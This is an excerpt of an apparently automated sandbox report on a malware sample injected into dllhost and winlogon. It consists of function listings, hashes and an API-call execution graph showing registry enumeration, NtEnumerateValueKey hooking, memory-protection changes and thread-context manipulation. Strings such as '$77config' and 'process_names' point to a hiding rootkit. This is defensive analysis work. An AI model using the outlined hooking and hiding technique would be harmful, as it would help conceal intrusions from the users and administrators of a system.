                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: 625b55c7d289c3cb974f45602e3e52771a40f74f54af623f17ad6a6e766431fb
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: D7115E32619B4486EB608B25E444349BBE2FB88B94F584620EACD0B754DF7CC955C700
                                                                                                                                  Function 000000014000215C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                  • API String ID: 1646373207-2227199552
                                                                                                                                  • Opcode ID: 5fdfdaf207782c2e4505a8b41fd18e1fc270cf37202bd35206560f60eda4ae09
                                                                                                                                  • Instruction ID: e194bf1a3fa1b3309944728d39276a51a9fcec6c1a6e98ab46ee00148a29e363
                                                                                                                                  • Opcode Fuzzy Hash: 5fdfdaf207782c2e4505a8b41fd18e1fc270cf37202bd35206560f60eda4ae09
                                                                                                                                  • Instruction Fuzzy Hash: 0DD0C9F8B1260292EF1AEB6378953E052529BADBC5F4940209F0647372EE38C0D48218
                                                                                                                                  Function 00000290EDD01D2C Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: 4c167db9eddac8988c3ca807a26a23c6960b3d2c28b431bf5ddb36e092e5b419
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: 09118021E16B8485EB05CF66A88C35A77B1FBC9FD0F584528DE8E93765DF38D4828340
                                                                                                                                  Function 00000290EDD01264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction ID: 5de5c3ea1fc49847edc6011cc50ab03f709a485906c2158c55116dc782ce3b3e
                                                                                                                                  • Opcode Fuzzy Hash: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction Fuzzy Hash: EFE03931A226048AE7058B62D84C34937E1EB89B05F448424898A07350DF7D84D98740
                                                                                                                                  Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                  • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                                                                                                  • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                  • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                                                                                                  Function 00000290EDD01000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction ID: ebe191a66650f6f1e162002ae2473e364b6af8b954f51eb87e8f25fc397a4c4d
                                                                                                                                  • Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction Fuzzy Hash: F1E0E571A22A488AE70A9B62D84C35977B1FF89B15F888424C94A07320EE3C84D98A10
                                                                                                                                  Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                  • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                  • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                  • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:127
                                                                                                                                  Total number of Limit Nodes:14
                                                                                                                                  execution_graph 14383 2e991755a4d 14384 2e991755a54 14383->14384 14385 2e991755abb 14384->14385 14386 2e991755b37 VirtualProtect 14384->14386 14387 2e991755b71 14386->14387 14388 2e991755b63 GetLastError 14386->14388 14388->14387 14389 2e99175f130 VirtualProtect 14390 2e991751bc0 14397 2e991751724 GetProcessHeap HeapAlloc 14390->14397 14392 2e991751bcf 14393 2e991751bd6 SleepEx 14392->14393 14396 2e99175159c StrCmpIW StrCmpW 14392->14396 14448 2e9917519b0 14392->14448 14394 2e991751724 50 API calls 14393->14394 14394->14392 14396->14392 14465 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14397->14465 14399 2e99175174c 14466 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14399->14466 14401 2e991751754 14467 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14401->14467 14403 2e99175175d 14468 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14403->14468 14405 2e991751766 14469 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14405->14469 14407 2e99175176f 14470 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14407->14470 14409 2e991751778 14471 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14409->14471 14411 2e991751781 14472 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14411->14472 14413 2e99175178a RegOpenKeyExW 14414 2e9917517bc RegOpenKeyExW 14413->14414 14415 2e9917519a2 14413->14415 14416 2e9917517fb RegOpenKeyExW 14414->14416 14417 2e9917517e5 14414->14417 14415->14392 14418 2e99175181f 14416->14418 14419 2e991751836 RegOpenKeyExW 14416->14419 14479 2e9917512b8 RegQueryInfoKeyW 14417->14479 14473 2e99175104c RegQueryInfoKeyW 14418->14473 14422 2e99175185a 14419->14422 14423 2e991751871 RegOpenKeyExW 14419->14423 14426 2e9917512b8 16 API calls 14422->14426 14427 2e9917518ac RegOpenKeyExW 14423->14427 14428 2e991751895 14423->14428 14429 2e991751867 RegCloseKey 14426->14429 14431 2e9917518d0 14427->14431 14432 2e9917518e7 RegOpenKeyExW 14427->14432 14430 2e9917512b8 16 API calls 14428->14430 14429->14423 14435 2e9917518a2 RegCloseKey 14430->14435 14436 2e9917512b8 16 API calls 14431->14436 14433 2e99175190b 14432->14433 14434 2e991751922 RegOpenKeyExW 14432->14434 14437 2e99175104c 6 API calls 14433->14437 14438 2e99175195d RegOpenKeyExW 14434->14438 14439 2e991751946 14434->14439 14435->14427 14440 2e9917518dd RegCloseKey 14436->14440 14441 2e991751918 RegCloseKey 14437->14441 14443 2e991751998 RegCloseKey 14438->14443 14444 2e991751981 14438->14444 14442 2e99175104c 6 API calls 14439->14442 14440->14432 14441->14434 14445 2e991751953 RegCloseKey 14442->14445 14443->14415 14446 2e99175104c 6 API calls 14444->14446 14445->14438 14447 2e99175198e RegCloseKey 14446->14447 14447->14443 14493 2e9917514a0 14448->14493 14465->14399 14466->14401 14467->14403 14468->14405 14469->14407 14470->14409 14471->14411 14472->14413 14474 2e9917510bf 14473->14474 14475 2e9917511b5 RegCloseKey 14473->14475 14474->14475 14476 2e9917510cf RegEnumValueW 14474->14476 14475->14419 14477 2e991751125 14476->14477 14477->14475 14477->14476 14478 2e99175114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14477->14478 14478->14477 14480 2e991751486 RegCloseKey 14479->14480 14481 2e991751323 GetProcessHeap HeapAlloc 14479->14481 14480->14416 14482 2e99175134e RegEnumValueW 14481->14482 14483 2e991751472 GetProcessHeap HeapFree 14481->14483 14484 2e9917513a1 14482->14484 14483->14480 14484->14482 14484->14483 14486 2e9917513cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14484->14486 14487 2e99175141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 14484->14487 14488 2e991751530 14484->14488 14486->14487 14487->14484 14489 2e991751580 14488->14489 14490 2e99175154a 14488->14490 14489->14484 14490->14489 14491 2e991751569 StrCmpW 14490->14491 14492 2e991751561 StrCmpIW 14490->14492 14491->14490 14492->14490 14494 2e9917514e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 14493->14494 14495 2e9917514c2 GetProcessHeap HeapFree 14493->14495 14495->14494 14495->14495 14496 2e9917561f0 14497 2e9917561fd 14496->14497 14498 2e991756209 14497->14498 14505 2e99175631a 14497->14505 14499 2e99175623e 14498->14499 14503 2e99175628d 14498->14503 14500 2e991756266 SetThreadContext 14499->14500 14500->14503 14501 2e9917563fe 14504 2e99175641e 14501->14504 14518 2e9917548e0 14501->14518 14502 2e991756341 VirtualProtect FlushInstructionCache 14502->14505 14514 2e9917552f0 GetCurrentProcess 14504->14514 14505->14501 14505->14502 14508 2e991756423 14509 2e991756477 14508->14509 14510 2e991756437 ResumeThread 14508->14510 14522 2e991757e30 14509->14522 14511 2e99175646b 14510->14511 14511->14508 14515 2e99175530c 14514->14515 14516 2e991755322 VirtualProtect FlushInstructionCache 14515->14516 14517 2e991755353 14515->14517 14516->14515 14517->14508 14520 2e9917548fc 14518->14520 14519 2e99175495f 14519->14504 14520->14519 14521 2e991754912 VirtualFree 14520->14521 14521->14520 14523 2e991757e39 14522->14523 14524 2e9917564bf 14523->14524 14525 2e991758608 IsProcessorFeaturePresent 14523->14525 14526 2e991758620 14525->14526 14531 2e9917586dc RtlCaptureContext 14526->14531 14532 2e9917586f6 RtlLookupFunctionEntry 14531->14532 14533 2e99175870c RtlVirtualUnwind 14532->14533 14534 2e991758633 14532->14534 14533->14532 14533->14534 14535 2e9917585d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14534->14535 14536 2e991753fb9 14539 2e991753f06 _invalid_parameter_noinfo 14536->14539 14537 2e991753f70 14538 2e991753f56 VirtualQuery 14538->14537 14538->14539 14539->14537 14539->14538 14540 2e991753f8a VirtualAlloc 14539->14540 14540->14537 14541 2e991753fbb GetLastError 14540->14541 14541->14537 14541->14539 14542 2e991752b6c NtEnumerateValueKey 14543 2e991752c14 14542->14543 14545 2e991752bb8 14542->14545 14544 2e991752bc6 NtEnumerateValueKey 14544->14545 14545->14543 14545->14544 14547 2e991753d4c 14545->14547 14548 2e991753d59 StrCmpNIW 14547->14548 14549 2e991753d6e 14547->14549 14548->14549 14549->14545

                                                                                                                                  Executed Functions

                                                                                                                                  Function 000002E991752B6C Relevance: 3.1, APIs: 2, Instructions: 64nativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 300 2e991752b6c-2e991752bb6 NtEnumerateValueKey 301 2e991752bb8-2e991752bbb 300->301 302 2e991752c14-2e991752c32 300->302 301->302 303 2e991752bbd-2e991752bbf 301->303 304 2e991752bc2-2e991752bc4 303->304 304->302 305 2e991752bc6-2e991752be5 NtEnumerateValueKey 304->305 306 2e991752bf6 305->306 307 2e991752be7-2e991752bea 305->307 310 2e991752bfa-2e991752c12 call 2e991753d4c 306->310 308 2e991752bf0-2e991752bf4 307->308 309 2e991752bec-2e991752bee 307->309 308->310 309->310 310->302 310->304
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumerateValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1749906896-0
                                                                                                                                  • Opcode ID: cce93084de4f1c13faca434b1b58a320d42ce6f8b5b46e4938d1791c75797ad0
                                                                                                                                  • Instruction ID: bb0b746c7d7e8e1c1c3dc8ea7404da3bf1fab72ceb8828c67ca5494de085e915
                                                                                                                                  • Opcode Fuzzy Hash: cce93084de4f1c13faca434b1b58a320d42ce6f8b5b46e4938d1791c75797ad0
                                                                                                                                  • Instruction Fuzzy Hash: CB219D3270478286E3248F17E84462AB7A4F784F90F52401ADE9643756EF34D8C2CB10
                                                                                                                                  Function 000002E991751724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                  • String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                  • API String ID: 2135414181-649645306
                                                                                                                                  • Opcode ID: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction ID: 9cecd22dc93b93da146973eae8eaed19efab71e352ccd1da79b14e235d8f31d8
                                                                                                                                  • Opcode Fuzzy Hash: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction Fuzzy Hash: B1713C36350A9285EB109F77E85869933B4FB88BC9F42111BDE4E97B2ADF34C484DB50
                                                                                                                                  Function 000002E99175ED48 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                  • API String ID: 740688525-1880043860
                                                                                                                                  • Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction ID: b0209ebd61e2fab8511d4edb2354d5e0ab5c113fe7e541c4a772a81c8cdb100f
                                                                                                                                  • Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction Fuzzy Hash: A351E42175178691FA159B67E8083996390BB48BF0F4A072EDE3D477C2DF38C4C59B61
                                                                                                                                  Function 000002E991753C98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                  • String ID: wr
                                                                                                                                  • API String ID: 1092925422-2678910430
                                                                                                                                  • Opcode ID: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction ID: e1cd0f3384c7bd7116e6fab5b716cc361b72aa22bfdca43cb9415272024f5181
                                                                                                                                  • Opcode Fuzzy Hash: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction Fuzzy Hash: 29115E2634478282EB549B22E40C2696261FB48BD4F06042ADE8D477A5EF3DC989CB24
                                                                                                                                  Function 000002E991756030 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 94 2e991756030-2e991756057 95 2e991756059-2e991756068 94->95 96 2e99175606b-2e991756076 GetCurrentThreadId 94->96 95->96 97 2e991756078-2e99175607d 96->97 98 2e991756082-2e991756089 96->98 99 2e9917564af-2e9917564c6 call 2e991757e30 97->99 100 2e99175609b-2e9917560af 98->100 101 2e99175608b-2e991756096 call 2e991755e60 98->101 104 2e9917560be-2e9917560c4 100->104 101->99 107 2e9917560ca-2e9917560d3 104->107 108 2e991756195-2e9917561b6 104->108 110 2e99175611a-2e99175618d call 2e991754a10 call 2e9917549b0 call 2e991754970 107->110 111 2e9917560d5-2e991756118 call 2e991763800 107->111 114 2e99175631f-2e991756330 call 2e9917579bf 108->114 115 2e9917561bc-2e9917561dc GetThreadContext 108->115 121 2e991756190 110->121 111->121 125 2e991756335-2e99175633b 114->125 119 2e99175631a 115->119 120 2e9917561e2-2e991756203 115->120 119->114 120->119 126 2e991756209-2e991756212 120->126 121->104 129 2e9917563fe-2e99175640e 125->129 130 2e991756341-2e991756398 VirtualProtect FlushInstructionCache 125->130 131 2e991756292-2e9917562a3 126->131 132 2e991756214-2e991756225 126->132 141 2e99175641e-2e99175642a call 2e9917552f0 129->141 142 2e991756410-2e991756417 129->142 134 2e99175639a-2e9917563a4 130->134 135 2e9917563c9-2e9917563f9 call 2e991757d9c 130->135 138 2e991756315 131->138 139 2e9917562a5-2e9917562c3 131->139 136 2e99175628d 132->136 137 2e991756227-2e99175623c 132->137 134->135 143 2e9917563a6-2e9917563c1 call 2e991754890 134->143 135->125 136->138 137->136 144 2e99175623e-2e991756288 call 2e991753e70 SetThreadContext 137->144 139->138 146 2e9917562c5-2e99175630c call 2e991753e00 139->146 155 2e99175642f-2e991756435 141->155 142->141 147 2e991756419 call 2e9917548e0 142->147 143->135 144->136 146->138 161 2e991756310 call 2e9917579dd 146->161 147->141 159 2e991756477-2e991756495 155->159 160 2e991756437-2e991756475 ResumeThread call 2e991757d9c 155->160 163 2e9917564a9 159->163 164 2e991756497-2e9917564a6 159->164 160->155 161->138 163->99 164->163
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
